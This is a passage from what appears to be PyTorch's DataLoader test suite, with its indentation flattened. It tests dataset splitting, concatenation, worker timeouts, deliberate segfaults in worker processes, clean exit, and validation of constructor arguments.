# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for an inter-process communication can vary widely. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
def test_splits_indexing_type(self):
r"""Indices generated by random_split
should be of integer type
"""
class CustomDataset():
def __init__(self, test_object, custom_list):
self.data = custom_list
self.test_object = test_object
def __getitem__(self, key):
self.test_object.assertEqual(type(key), type(0))
return self.data[key]
def __len__(self):
return len(self.data)
x = [1, 2, 3, 4, 5]
dataset = CustomDataset(self, x)
dataset = random_split(dataset, [5])[0]
data_loader = DataLoader(dataset)
for batch in data_loader:
pass
def test_splits_reproducibility(self):
self.assertEqual(
[list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
[[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
)
self.assertEqual(
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
)
def test_splits_generator(self):
# A random_split without a specific generator should affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5])
b = torch.rand(10)
self.assertNotEqual(a, b)
# A random_split with a specific generator should not affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
b = torch.rand(10)
self.assertEqual(a, b)
def test_slicing_of_subset_of_dataset(self):
# Testing slicing a subset initialized with a dataset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_dataset[:], dataset[:])
self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset from random split
subset1, subset2 = random_split(dataset, [3, 2])
self.assertEqual(subset1[:], dataset[subset1.indices[:]])
self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
def test_slicing_of_subset_of_subset(self):
# Testing slicing a subset initialized with a subset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_subset[:], dataset[:])
self.assertEqual(subset_of_subset[0:2], dataset[0:2])
self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset of subset from random split
subset1, subset2 = random_split(dataset, [4, 1])
subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
idx = [subset1.indices[i] for i in subset_of_subset1.indices]
self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
def __init__(self, n):
super(CUDACountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return torch.as_tensor(i, device='cuda')
def __len__(self):
return self.n
class CountingDataset(Dataset):
def __init__(self, n):
super(CountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return i
def __len__(self):
return self.n
class CountingIterableDataset(IterableDataset):
def __init__(self, n):
super(CountingIterableDataset, self).__init__()
self.n = n
def __iter__(self):
return iter(range(self.n))
def __len__(self):
return self.n
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
def test_iterable_dataset_err(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
it1 = CountingIterableDataset(5)
it2 = CountingIterableDataset(10)
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([d1, it2, it1])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it2])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it1, d1])
# takes in dummy var so this can also be used as a `worker_init_fn`
def set_faulthander_if_available(_=None):
faulthandler.enable(sys.__stderr__)
if not IS_WINDOWS:
# windows does not have faulthandler.register
# chain=False prevents the default behavior of killing the process
faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)
set_faulthander_if_available()
# Process `pid` must have called `set_faulthander_if_available`
def print_traces_of_all_threads(pid):
if not IS_WINDOWS:
# use the custom signal if available
os.kill(pid, signal.SIGUSR1)
else:
# otherwise we can still use the handler given by faulthandler.enable()
# at the cost of killing the process.
os.kill(pid, signal.SIGSEGV)
# wait in parent process to give subprocess some time to print
time.sleep(5)
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
# Why no *args?
# py2 doesn't support def fn(x, *args, key=val, **kwargs)
    # Setting disable_stderr=False may generate a lot of unrelated error outputs
    # but could be helpful for debugging.
def __init__(self, disable_stderr=True, **kwargs):
super(ErrorTrackingProcess, self).__init__(**kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
self.disable_stderr = disable_stderr
def run(self):
set_faulthander_if_available()
if self.disable_stderr:
# Disable polluting stderr with errors that are supposed to happen.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
def print_traces_of_all_threads(self):
assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
# On platforms without `SIGUSR1`, `set_faulthander_if_available` sets
# `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
# the process. So let's poll the exception first
_ = self.exception
print_traces_of_all_threads(self.pid)
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
    # ESRCH means that os.kill could not find a process with that pid
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
self.sleeped = False
def __getitem__(self, idx):
if not self.sleeped:
time.sleep(self.sleep_sec)
self.sleeped = True
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
class WorkerSpecificIterableDataset(IterableDataset):
def __init__(self, sizes_for_all_workers):
self.sizes_for_all_workers = sizes_for_all_workers
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
return iter(range(self.sizes_for_all_workers[worker_info.id]))
def __len__(self):
return sum(self.sizes_for_all_workers)
# Inspired by https://stackoverflow.com/a/26703365
# If all workers call `sync_once`, they will block until every worker
# reaches the call (i.e., it acts like a barrier).
# This can be used to ensure that each worker processes at least one sample.
class SynchronizedDataset(Dataset):
def __init__(self, size, batch_size, num_workers):
assert size >= num_workers * batch_size
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def sync_once(self):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
def __getitem__(self, idx):
raise NotImplementedError
def __len__(self):
return self.size
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.initial_seed()
def _test_timeout(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_timeout_pin_memory(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1, pin_memory=True,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_large_sampler_indices(persistent_workers):
# See
# test_large_sampler_indices
# https://github.com/pytorch/pytorch/issues/48666
dataloader = torch.utils.data.DataLoader(
EmptyTensorDataset(10000000),
batch_size=40960,
persistent_workers=persistent_workers,
num_workers=1)
it = iter(dataloader)
for x in it:
assert x.numel() == 0
raise RuntimeError('My Error')
def disable_stderr(worker_id):
r"""
Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
from workers. Since worker signal handler prints with low-level write(),
this has to be done on OS level via dup.
This is used as worker_init_fn for test_segfault.
"""
sys.stderr.flush() # flush library buffers that dup2 knows nothing about
# Can't use a with-block because otherwise the fd will be closed when this
# function ends.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
_ = next(iter(dataloader))
def _test_no_segfault():
dataset = [1, 2, 3]
num_threads = torch.get_num_threads()
if num_threads < 4:
torch.set_num_threads(4)
else:
torch.set_num_threads(num_threads)
mp_ctx = torch.multiprocessing.get_context(method='fork')
dataloader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
multiprocessing_context=mp_ctx)
_ = next(iter(dataloader))
class TestProperExitDataset(Dataset):
def __init__(self, size, error_event):
self.size = size
self.error_event = error_event
def __len__(self):
return self.size
def __getitem__(self, idx):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
def __init__(self, size, error_event):
self.error_event = error_event
self.size = size
self.remaining = size
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
self.remaining -= 1
if self.remaining < 0:
raise StopIteration
return torch.tensor(-1000)
next = __next__ # py2 compatibility
# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
hold_iter_reference, loader_setup_event, tester_setup_event,
persistent_workers):
num_workers = 2 if use_workers else 0
if exit_method == 'worker_error' or exit_method == 'worker_kill':
assert use_workers is True
if exit_method == 'worker_error':
worker_error_event = mp.Event()
else:
worker_error_event = None
if is_iterable_dataset:
ds = TestProperExitIterableDataset(7, worker_error_event)
else:
ds = TestProperExitDataset(12, worker_error_event)
loader = DataLoader(ds, batch_size=1, shuffle=False,
num_workers=num_workers, pin_memory=pin_memory,
worker_init_fn=set_faulthander_if_available,
persistent_workers=persistent_workers)
error_it = 2
if use_workers:
# 2 is the magical per-worker prefetch number...
# FIXME: change this after the number becomes configurable.
if is_iterable_dataset:
assert len(ds) * num_workers > (error_it + 2 + 1)
else:
assert len(loader) > (error_it + 2 + 1) * num_workers
else:
if is_iterable_dataset:
assert len(ds) > error_it + 1
else:
assert len(loader) > error_it + 1
it = iter(loader)
if use_workers:
workers = it._workers
def kill_pid(pid):
psutil_p = psutil.Process(pid)
psutil_p.kill()
psutil_p.wait(JOIN_TIMEOUT)
assert not psutil_p.is_running()
for i, _ in enumerate(it):
if i == 0:
if not hold_iter_reference:
del it
del loader
loader_setup_event.set()
tester_setup_event.wait()
# ensure that the workers are still alive
if use_workers:
for w in workers:
assert w.is_alive()
if worker_error_event is not None:
worker_error_event.set()
if i == error_it:
if exit_method == 'loader_error':
raise RuntimeError('Loader error')
elif exit_method == 'loader_kill':
kill_pid(os.getpid())
elif exit_method == 'worker_kill':
kill_pid(workers[-1].pid) # kill last worker
if not hold_iter_reference:
# Tries to trigger the __del__ clean-up rather than the automatic
# exiting of daemonic children. Technically it should be automatically
# triggered, but I don't want to rely on the implementation detail of
# Python gc.
gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def test_worker_info_init_fn(worker_id):
worker_info = torch.utils.data.get_worker_info()
assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
dataset = worker_info.dataset
assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
# test that WorkerInfo attributes are read-only
try:
worker_info.id = 3999
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
try:
worker_info.a = 3
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
for k in ['id', 'num_workers', 'seed', 'dataset']:
assert "{}=".format(k) in repr(worker_info)
dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
# get_worker_info returns None in main proc
assert torch.utils.data.get_worker_info() is None
num_workers = 2
batch_size = 2
dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
dataloader = DataLoader(dataset, batch_size=batch_size,
num_workers=num_workers,
worker_init_fn=test_worker_info_init_fn)
it = iter(dataloader)
data = []
for d in it:
data.append(d)
worker_pids = [w.pid for w in it._workers]
data = torch.cat(data, 0)
for d in data:
# each `d` is a [worker_id, worker_pid] pair, which is set in
# test_worker_info_init_fn
assert d[1] == worker_pids[d[0]]
# get_worker_info returns None in main proc after data loading
assert torch.utils.data.get_worker_info() is None
# main proc dataset was never assigned this attribute
assert not hasattr(dataset, 'value')
try:
_ = dataset[0]
except AttributeError:
return
raise RuntimeError('Expected AttributeError')
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
def __iter__(self):
raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
def __init__(self, length):
self.length = length
def __getitem__(self, indices):
assert isinstance(indices, (list, tuple))
return torch.as_tensor(indices)
def __len__(self):
return self.length
class BulkLoadingSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size):
self.dataset = dataset
self.batch_size = batch_size
def __iter__(self):
for x in torch.randperm(len(self.dataset)).split(self.batch_size):
yield x.tolist()
def __len__(self):
return int(math.ceil(len(self.dataset) / float(self.batch_size)))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
if persistent_workers and kwargs.get('num_workers', 0) == 0:
persistent_workers = False
kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
if batch_size is None:
for i, (batch_samples, batch_targets) in enumerate(loader):
sample, target = (batch_samples, batch_targets)
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1))
self.assertEqual(sum(found_labels.values()), (i + 1))
self.assertEqual(i, (len(self.dataset) - 1))
else:
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
def test_typing(self):
from typing import List
# Make sure there is no TypeError
class SomeDatasetClass(Dataset[List[torch.Tensor]]):
pass
def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
pass
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super().__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)),
num_workers=1):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests whether the child process forked by the DataLoader segfaults when the
# parent process has more than 3 threads after at least one set_num_threads
# invocation in the parent. After forking, set_num_threads(1) in the child has to
# handle data structures inherited from the parent's Caffe2 thread pool, which can
# culminate in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
# Test that the data loader exits cleanly when the process errors while
# 1. holding a reference to the iterator
# 2. using a sampler that yields big elements s.t. _index_queues putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
def test_invalid_ctor_args_combinations(self):
# general
with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
self._get_data_loader(self.dataset, num_workers=-1)
with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
self._get_data_loader(self.dataset, timeout=-1)
# disable auto-batching
with self.assertRaisesRegex(ValueError,
"batch_size=None option disables auto-batching and is mutually exclusive"):
self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
# map-style
sampler = torch.utils.data.SequentialSampler(self.dataset)
batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
# iterable-style
dataset = CountingIterableDataset(20)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=True)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
